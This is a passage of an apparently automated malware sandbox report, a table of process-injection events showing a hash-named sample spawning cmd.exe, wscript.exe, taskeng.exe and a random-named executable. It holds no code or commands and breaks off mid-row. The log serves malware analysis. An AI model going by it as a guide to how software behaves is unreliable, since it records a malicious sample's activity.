description pid Process procid_target PID 1116 wrote to memory of 1844 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 26 PID 1116 wrote to memory of 1844 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 26 PID 1116 wrote to memory of 1844 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 26 PID 1116 wrote to memory of 1844 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 26 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 28 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 28 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 28 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 28 PID 1116 wrote to memory of 1988 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 33 PID 1116 wrote to memory of 1988 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 33 PID 1116 wrote to memory of 1988 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 33 PID 1116 wrote to memory of 1988 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 33 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 34 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 34 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 34 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 34 PID 1988 wrote to memory of 1612 1988 cmd.exe 38 PID 1988 wrote to memory of 1612 1988 cmd.exe 38 PID 1988 wrote to memory of 1612 1988 cmd.exe 38 PID 1988 wrote to memory of 1612 1988 cmd.exe 38 PID 296 wrote to memory of 732 296 cmd.exe 37 PID 296 wrote to memory of 732 296 cmd.exe 37 PID 296 wrote to memory of 732 296 cmd.exe 37 PID 296 wrote to memory of 732 296 cmd.exe 37 PID 1988 wrote to memory of 596 1988 cmd.exe 39 PID 1988 wrote to memory of 596 1988 cmd.exe 39 PID 1988 wrote to memory of 596 1988 cmd.exe 39 PID 1988 wrote to memory of 596 1988 cmd.exe 39 PID 1988 wrote to memory of 1544 1988 cmd.exe 40 PID 1988 wrote to memory of 1544 1988 cmd.exe 40 PID 1988 wrote to memory of 1544 1988 cmd.exe 40 PID 1988 wrote to memory of 1544 1988 cmd.exe 40 PID 1116 wrote to memory of 1980 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 41 PID 1116 wrote to memory of 1980 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 41 PID 1116 wrote to memory of 1980 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 41 PID 1116 wrote to memory of 1980 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 41 PID 1980 wrote to memory of 1840 1980 cmd.exe 43 PID 1980 wrote to memory of 1840 1980 cmd.exe 43 PID 1980 wrote to memory of 1840 1980 cmd.exe 43 PID 1980 wrote to memory of 1840 1980 cmd.exe 43 PID 1980 wrote to memory of 1544 1980 cmd.exe 44 PID 1980 wrote to memory of 1544 1980 cmd.exe 44 PID 1980 wrote to memory of 1544 1980 cmd.exe 44 PID 1980 wrote to memory of 1544 1980 cmd.exe 44 PID 1980 wrote to memory of 892 1980 cmd.exe 45 PID 1980 wrote to memory of 892 1980 cmd.exe 45 PID 1980 wrote to memory of 892 1980 cmd.exe 45 PID 1980 wrote to memory of 892 1980 cmd.exe 45 PID 892 wrote to memory of 1964 892 cmd.exe 46 PID 892 wrote to memory of 1964 892 cmd.exe 46 PID 892 wrote to memory of 1964 892 cmd.exe 46 PID 892 wrote to memory of 1964 892 cmd.exe 46 PID 732 wrote to memory of 1816 732 wscript.exe 47 PID 732 wrote to memory of 1816 732 wscript.exe 47 PID 732 wrote to memory of 1816 732 wscript.exe 47 PID 732 wrote to memory of 1816 732 wscript.exe 47 PID 1964 wrote to memory of 1060 1964 IhR8G8EE.exe 49 PID 1964 wrote to memory of 1060 1964 IhR8G8EE.exe 49 PID 1964 wrote to memory of 1060 1964 IhR8G8EE.exe 49 PID 1964 wrote to memory of 1060 1964 IhR8G8EE.exe 49 PID 1816 wrote to memory of 1236 1816 cmd.exe 50 PID 1816 wrote to memory of 1236 1816 cmd.exe 50 PID 1816 wrote to memory of 1236 1816 cmd.exe 50 PID 1816 wrote to memory of 1236 1816 cmd.exe 50 PID 732 wrote to memory of 436 732 wscript.exe 52 PID 732 wrote to memory of 436 732 wscript.exe 52 PID 732 wrote to memory of 436 732 wscript.exe 52 PID 732 wrote to memory of 436 732 wscript.exe 52 PID 436 wrote to memory of 548 436 cmd.exe 54 PID 436 wrote to memory of 548 436 cmd.exe 54 PID 436 wrote to memory of 548 436 cmd.exe 54 PID 436 wrote to memory of 548 436 cmd.exe 54 PID 1328 wrote to memory of 1800 1328 taskeng.exe 56 PID 1328 wrote to memory of 1800 1328 taskeng.exe 56 PID 1328 wrote to memory of 1800 1328 taskeng.exe 56 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 57 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 57 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 57 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 57 PID 1468 wrote to memory of 1816 1468 cmd.exe 59 PID 1468 wrote to memory of 1816 1468 cmd.exe 59 PID 1468 wrote to memory of 1816 1468 cmd.exe 59 PID 1468 wrote to memory of 1816 1468 cmd.exe 59 PID 1468 wrote to memory of 1480 1468 cmd.exe 60 PID 1468 wrote to memory of 1480 1468 cmd.exe 60 PID 1468 wrote to memory of 1480 1468 cmd.exe 60 PID 1468 wrote to memory of 1480 1468 cmd.exe 60 PID 1468 wrote to memory of 1988 1468 cmd.exe 61 PID 1468 wrote to memory of 1988 1468 cmd.exe 61 PID 1468 wrote to memory of 1988 1468 cmd.exe 61 PID 1468 wrote to memory of 1988 1468 cmd.exe 61 PID 1988 wrote to memory of 1484 1988 cmd.exe 62 PID 1988 wrote to memory of 1484 1988 cmd.exe 62 PID 1988 wrote to memory of 1484 1988 cmd.exe 62 PID 1988 wrote to memory of 1484 1988 cmd.exe 62 PID 1468 wrote to memory of 732 1468 cmd.exe 63 PID 1468 wrote to memory of 732 1468 cmd.exe 63 PID 1468 wrote to memory of 732 1468 cmd.exe 63 PID 1468 wrote to memory of 732 1468 cmd.exe 63 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 64 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 64 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 64 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 64 PID 1344 wrote to memory of 972 1344 cmd.exe 66 PID 1344 wrote to memory of 972 1344 cmd.exe 66 PID 1344 wrote to memory of 972 1344 cmd.exe 66 PID 1344 wrote to memory of 972 1344 cmd.exe 66 PID 1344 wrote to memory of 300 1344 cmd.exe 67 PID 1344 wrote to memory of 300 1344 cmd.exe 67 PID 1344 wrote to memory of 300 1344 cmd.exe 67 PID 1344 wrote to memory of 300 1344 cmd.exe 67 PID 1344 wrote to memory of 1876 1344 cmd.exe 68 PID 1344 wrote to memory of 1876 1344 cmd.exe 68 PID 1344 wrote to memory of 1876 1344 cmd.exe 68 PID 1344 wrote to memory of 1876 1344 cmd.exe 68 PID 1876 wrote to memory of 1896 1876 cmd.exe 69 PID 1876 wrote to memory of 1896 1876 cmd.exe 69 PID 1876 wrote to memory of 1896 1876 cmd.exe 69 PID 1876 wrote to memory of 1896 1876 cmd.exe 69 PID 1344 wrote to memory of 1888 1344 cmd.exe 70 PID 1344 wrote to memory of 1888 1344 cmd.exe 70 PID 1344 wrote to memory of 1888 1344 cmd.exe 70 PID 1344 wrote to memory of 1888 1344 cmd.exe 70 PID 1116 wrote to memory of 596 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 71 PID 1116 wrote to memory of 596 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 71 PID 1116 wrote to memory of 596 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 71 PID 1116 wrote to memory of 596 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 71 PID 596 wrote to memory of 1904 596 cmd.exe 73 PID 596 wrote to memory of 1904 596 cmd.exe 73 PID 596 wrote to memory of 1904 596 cmd.exe 73 PID 596 wrote to memory of 1904 596 cmd.exe 73 PID 596 wrote to memory of 1804 596 cmd.exe 74 PID 596 wrote to memory of 1804 596 cmd.exe 74 PID 596 wrote to memory of 1804 596 cmd.exe 74 PID 596 wrote to memory of 1804 596 cmd.exe 74 PID 596 wrote to memory of 1236 596 cmd.exe 75 PID 596 wrote to memory of 1236 596 cmd.exe 75 PID 596 wrote to memory of 1236 596 cmd.exe 75 PID 596 wrote to memory of 1236 596 cmd.exe 75 PID 1236 wrote to memory of 928 1236 cmd.exe 76 PID 1236 wrote to memory of 928 1236 cmd.exe 76 PID 1236 wrote to memory of 928 1236 cmd.exe 76 PID 1236 wrote to memory of 928 1236 cmd.exe 76 PID 596 wrote to memory of 1052 596 cmd.exe 78 PID 596 wrote to memory of 1052 596 cmd.exe 78 PID 596 wrote to memory of 1052 596 cmd.exe 78 PID 596 wrote to memory of 1052 596 cmd.exe 78 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 79 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 79 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 79 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 79 PID 296 wrote to memory of 1324 296 cmd.exe 81 PID 296 wrote to memory of 1324 296 cmd.exe 81 PID 296 wrote to memory of 1324 296 cmd.exe 81 PID 296 wrote to memory of 1324 296 cmd.exe 81 PID 296 wrote to memory of 1312 296 cmd.exe 82 PID 296 wrote to memory of 1312 296 cmd.exe 82 PID 296 wrote to memory of 1312 296 cmd.exe 82 PID 296 wrote to memory of 1312 296 cmd.exe 82 PID 296 wrote to memory of 972 296 cmd.exe 83 PID 296 wrote to memory of 972 296 cmd.exe 83 PID 296 wrote to memory of 972 296 cmd.exe 83 PID 296 wrote to memory of 972 296 cmd.exe 83 PID 972 wrote to memory of 1772 972 cmd.exe 84 PID 972 wrote to memory of 1772 972 cmd.exe 84 PID 972 wrote to memory of 1772 972 cmd.exe 84 PID 972 wrote to memory of 1772 972 cmd.exe 84 PID 296 wrote to memory of 1632 296 cmd.exe 85 PID 296 wrote to memory of 1632 296 cmd.exe 85 PID 296 wrote to memory of 1632 296 cmd.exe 85 PID 296 wrote to memory of 1632 296 cmd.exe 85 PID 1800 wrote to memory of 1912 1800 cmd.exe 86 PID 1800 wrote to memory of 1912 1800 cmd.exe 86 PID 1800 wrote to memory of 1912 1800 cmd.exe 86 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 87 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 87 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 87 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 87 PID 1876 wrote to memory of 1344 1876 cmd.exe 89 PID 1876 wrote to memory of 1344 1876 cmd.exe 89 PID 1876 wrote to memory of 1344 1876 cmd.exe 89 PID 1876 wrote to memory of 1344 1876 cmd.exe 89 PID 1876 wrote to memory of 1908 1876 cmd.exe 90 PID 1876 wrote to memory of 1908 1876 cmd.exe 90 PID 1876 wrote to memory of 1908 1876 cmd.exe 90 PID 1876 wrote to memory of 1908 1876 cmd.exe 90 PID 1876 wrote to memory of 1376 1876 cmd.exe 91 PID 1876 wrote to memory of 1376 1876 cmd.exe 91 PID 1876 wrote to memory of 1376 1876 cmd.exe 91 PID 1876 wrote to memory of 1376 1876 cmd.exe 91 PID 1376 wrote to memory of 484 1376 cmd.exe 92 PID 1376 wrote to memory of 484 1376 cmd.exe 92 PID 1376 wrote to memory of 484 1376 cmd.exe 92 PID 1376 wrote to memory of 484 1376 cmd.exe 92 PID 1876 wrote to memory of 1804 1876 cmd.exe 93 PID 1876 wrote to memory of 1804 1876 cmd.exe 93 PID 1876 wrote to memory of 1804 1876 cmd.exe 93 PID 1876 wrote to memory of 1804 1876 cmd.exe 93 PID 1116 wrote to memory of 680 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 96 PID 1116 wrote to memory of 680 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 96 PID 1116 wrote to memory of 680 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 96 PID 1116 wrote to memory of 680 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 96 PID 680 wrote to memory of 1468 680 cmd.exe 98 PID 680 wrote to memory of 1468 680 cmd.exe 98 PID 680 wrote to memory of 1468 680 cmd.exe 98 PID 680 wrote to memory of 1468 680 cmd.exe 98 PID 680 wrote to memory of 1892 680 cmd.exe 99 PID 680 wrote to memory of 1892 680 cmd.exe 99 PID 680 wrote to memory of 1892 680 cmd.exe 99 PID 680 wrote to memory of 1892 680 cmd.exe 99 PID 680 wrote to memory of 1984 680 cmd.exe 100 PID 680 wrote to memory of 1984 680 cmd.exe 100 PID 680 wrote to memory of 1984 680 cmd.exe 100 PID 680 wrote to memory of 1984 680 cmd.exe 100 PID 1984 wrote to memory of 1512 1984 cmd.exe 101 PID 1984 wrote to memory of 1512 1984 cmd.exe 101 PID 1984 wrote to memory of 1512 1984 cmd.exe 101 PID 1984 wrote to memory of 1512 1984 cmd.exe 101 PID 680 wrote to memory of 1128 680 cmd.exe 102 PID 680 wrote to memory of 1128 680 cmd.exe 102 PID 680 wrote to memory of 1128 680 cmd.exe 102 PID 680 wrote to memory of 1128 680 cmd.exe 102 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 103 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 103 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 103 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 103 PID 1816 wrote to memory of 548 1816 cmd.exe 105 PID 1816 wrote to memory of 548 1816 cmd.exe 105 PID 1816 wrote to memory of 548 1816 cmd.exe 105 PID 1816 wrote to memory of 548 1816 cmd.exe 105 PID 1816 wrote to memory of 436 1816 cmd.exe 106 PID 1816 wrote to memory of 436 1816 cmd.exe 106 PID 1816 wrote to memory of 436 1816 cmd.exe 106 PID 1816 wrote to memory of 436 1816 cmd.exe 106 PID 1816 wrote to memory of 1752 1816 cmd.exe 107 PID 1816 wrote to memory of 1752 1816 cmd.exe 107 PID 1816 wrote to memory of 1752 1816 cmd.exe 107 PID 1816 wrote to memory of 1752 1816 cmd.exe 107 PID 1752 wrote to memory of 1772 1752 cmd.exe 108 PID 1752 wrote to memory of 1772 1752 cmd.exe 108 PID 1752 wrote to memory of 1772 1752 cmd.exe 108 PID 1752 wrote to memory of 1772 1752 cmd.exe 108 PID 1816 wrote to memory of 1936 1816 cmd.exe 109 PID 1816 wrote to memory of 1936 1816 cmd.exe 109 PID 1816 wrote to memory of 1936 1816 cmd.exe 109 PID 1816 wrote to memory of 1936 1816 cmd.exe 109 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 110 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 110 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 110 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 110 PID 1892 wrote to memory of 1512 1892 cmd.exe 112 PID 1892 wrote to memory of 1512 1892 cmd.exe 112 PID 1892 wrote to memory of 1512 1892 cmd.exe 112 PID 1892 wrote to memory of 1512 1892 cmd.exe 112 PID 1892 wrote to memory of 1756 1892 cmd.exe 113 PID 1892 wrote to memory of 1756 1892 cmd.exe 113 PID 1892 wrote to memory of 1756 1892 cmd.exe 113 PID 1892 wrote to memory of 1756 1892 cmd.exe 113 PID 1892 wrote to memory of 296 1892 cmd.exe 114 PID 1892 wrote to memory of 296 1892 cmd.exe 114 PID 1892 wrote to memory of 296 1892 cmd.exe 114 PID 1892 wrote to memory of 296 1892 cmd.exe 114 PID 296 wrote to memory of 1412 296 cmd.exe 115 PID 296 wrote to memory of 1412 296 cmd.exe 115 PID 296 wrote to memory of 1412 296 cmd.exe 115 PID 296 wrote to memory of 1412 296 cmd.exe 115 PID 1800 wrote to memory of 280 1800 cmd.exe 116 PID 1800 wrote to memory of 280 1800 cmd.exe 116 PID 1800 wrote to memory of 280 1800 cmd.exe 116 PID 1892 wrote to memory of 548 1892 cmd.exe 117 PID 1892 wrote to memory of 548 1892 cmd.exe 117 PID 1892 wrote to memory of 548 1892 cmd.exe 117 PID 1892 wrote to memory of 548 1892 cmd.exe 117 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 118 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 118 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 118 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 118 PID 972 wrote to memory of 224 972 cmd.exe 120 PID 972 wrote to memory of 224 972 cmd.exe 120 PID 972 wrote to memory of 224 972 cmd.exe 120 PID 972 wrote to memory of 224 972 cmd.exe 120 PID 972 wrote to memory of 1608 972 cmd.exe 121 PID 972 wrote to memory of 1608 972 cmd.exe 121 PID 972 wrote to memory of 1608 972 cmd.exe 121 PID 972 wrote to memory of 1608 972 cmd.exe 121 PID 972 wrote to memory of 1236 972 cmd.exe 122 PID 972 wrote to memory of 1236 972 cmd.exe 122 PID 972 wrote to memory of 1236 972 cmd.exe 122 PID 972 wrote to memory of 1236 972 cmd.exe 122 PID 1236 wrote to memory of 1752 1236 cmd.exe 123 PID 1236 wrote to memory of 1752 1236 cmd.exe 123 PID 1236 wrote to memory of 1752 1236 cmd.exe 123 PID 1236 wrote to memory of 1752 1236 cmd.exe 123 PID 972 wrote to memory of 1404 972 cmd.exe 124 PID 972 wrote to memory of 1404 972 cmd.exe 124 PID 972 wrote to memory of 1404 972 cmd.exe 124 PID 972 wrote to memory of 1404 972 cmd.exe 124 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 125 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 125 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 125 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 125 PID 1840 wrote to memory of 1376 1840 cmd.exe 127 PID 1840 wrote to memory of 1376 1840 cmd.exe 127 PID 1840 wrote to memory of 1376 1840 cmd.exe 127 PID 1840 wrote to memory of 1376 1840 cmd.exe 127 PID 1840 wrote to memory of 1096 1840 cmd.exe 128 PID 1840 wrote to memory of 1096 1840 cmd.exe 128 PID 1840 wrote to memory of 1096 1840 cmd.exe 128 PID 1840 wrote to memory of 1096 1840 cmd.exe 128 PID 1840 wrote to memory of 1564 1840 cmd.exe 129 PID 1840 wrote to memory of 1564 1840 cmd.exe 129 PID 1840 wrote to memory of 1564 1840 cmd.exe 129 PID 1840 wrote to memory of 1564 1840 cmd.exe 129 PID 1564 wrote to memory of 1632 1564 cmd.exe 130 PID 1564 wrote to memory of 1632 1564 cmd.exe 130 PID 1564 wrote to memory of 1632 1564 cmd.exe 130 PID 1564 wrote to memory of 1632 1564 cmd.exe 130 PID 1840 wrote to memory of 1948 1840 cmd.exe 131 PID 1840 wrote to memory of 1948 1840 cmd.exe 131 PID 1840 wrote to memory of 1948 1840 cmd.exe 131 PID 1840 wrote to memory of 1948 1840 cmd.exe 131 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 132 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 132 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 132 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 132 PID 1908 wrote to memory of 1080 1908 cmd.exe 134 PID 1908 wrote to memory of 1080 1908 cmd.exe 134 PID 1908 wrote to memory of 1080 1908 cmd.exe 134 PID 1908 wrote to memory of 1080 1908 cmd.exe 134 PID 1908 wrote to memory of 1772 1908 cmd.exe 135 PID 1908 wrote to memory of 1772 1908 cmd.exe 135 PID 1908 wrote to memory of 1772 1908 cmd.exe 135 PID 1908 wrote to memory of 1772 1908 cmd.exe 135 PID 1908 wrote to memory of 932 1908 cmd.exe 136 PID 1908 wrote to memory of 932 1908 cmd.exe 136 PID 1908 wrote to memory of 932 1908 cmd.exe 136 PID 1908 wrote to memory of 932 1908 cmd.exe 136 PID 932 wrote to memory of 1236 932 cmd.exe 137 PID 932 wrote to memory of 1236 932 cmd.exe 137 PID 932 wrote to memory of 1236 932 cmd.exe 137 PID 932 wrote to memory of 1236 932 cmd.exe 137 PID 1908 wrote to memory of 916 1908 cmd.exe 138 PID 1908 wrote to memory of 916 1908 cmd.exe 138 PID 1908 wrote to memory of 916 1908 cmd.exe 138 PID 1908 wrote to memory of 916 1908 cmd.exe 138 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 139 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 139 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 139 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 139 PID 848 wrote to memory of 1376 848 cmd.exe 141 PID 848 wrote to memory of 1376 848 cmd.exe 141 PID 848 wrote to memory of 1376 848 cmd.exe 141 PID 848 wrote to memory of 1376 848 cmd.exe 141 PID 848 wrote to memory of 1096 848 cmd.exe 142 PID 848 wrote to memory of 1096 848 cmd.exe 142 PID 848 wrote to memory of 1096 848 cmd.exe 142 PID 848 wrote to memory of 1096 848 cmd.exe 142 PID 848 wrote to memory of 296 848 cmd.exe 143 PID 848 wrote to memory of 296 848 cmd.exe 143 PID 848 wrote to memory of 296 848 cmd.exe 143 PID 848 wrote to memory of 296 848 cmd.exe 143 PID 296 wrote to memory of 1632 296 cmd.exe 144 PID 296 wrote to memory of 1632 296 cmd.exe 144 PID 296 wrote to memory of 1632 296 cmd.exe 144 PID 296 wrote to memory of 1632 296 cmd.exe 144 PID 848 wrote to memory of 1132 848 cmd.exe 145 PID 848 wrote to memory of 1132 848 cmd.exe 145 PID 848 wrote to memory of 1132 848 cmd.exe 145 PID 848 wrote to memory of 1132 848 cmd.exe 145 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 146 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 146 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 146 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 146 PID 1512 wrote to memory of 1480 1512 cmd.exe 148 PID 1512 wrote to memory of 1480 1512 cmd.exe 148 PID 1512 wrote to memory of 1480 1512 cmd.exe 148 PID 1512 wrote to memory of 1480 1512 cmd.exe 148 PID 1512 wrote to memory of 1772 1512 cmd.exe 149 PID 1512 wrote to memory of 1772 1512 cmd.exe 149 PID 1512 wrote to memory of 1772 1512 cmd.exe 149 PID 1512 wrote to memory of 1772 1512 cmd.exe 149 PID 1512 wrote to memory of 1876 1512 cmd.exe 150 PID 1512 wrote to memory of 1876 1512 cmd.exe 150 PID 1512 wrote to memory of 1876 1512 cmd.exe 150 PID 1512 wrote to memory of 1876 1512 cmd.exe 150 PID 1876 wrote to memory of 1236 1876 cmd.exe 151 PID 1876 wrote to memory of 1236 1876 cmd.exe 151 PID 1876 wrote to memory of 1236 1876 cmd.exe 151 PID 1876 wrote to memory of 1236 1876 cmd.exe 151 PID 1512 wrote to memory of 1404 1512 cmd.exe 152 PID 1512 wrote to memory of 1404 1512 cmd.exe 152 PID 1512 wrote to memory of 1404 1512 cmd.exe 152 PID 1512 wrote to memory of 1404 1512 cmd.exe 152 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 153 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 153 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 153 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 153 PID 232 wrote to memory of 864 232 cmd.exe 155 PID 232 wrote to memory of 864 232 cmd.exe 155 PID 232 wrote to memory of 864 232 cmd.exe 155 PID 232 wrote to memory of 864 232 cmd.exe 155 PID 232 wrote to memory of 1096 232 cmd.exe 156 PID 232 wrote to memory of 1096 232 cmd.exe 156 PID 232 wrote to memory of 1096 232 cmd.exe 156 PID 232 wrote to memory of 1096 232 cmd.exe 156 PID 232 wrote to memory of 1312 232 cmd.exe 157 PID 232 wrote to memory of 1312 232 cmd.exe 157 PID 232 wrote to memory of 1312 232 cmd.exe 157 PID 232 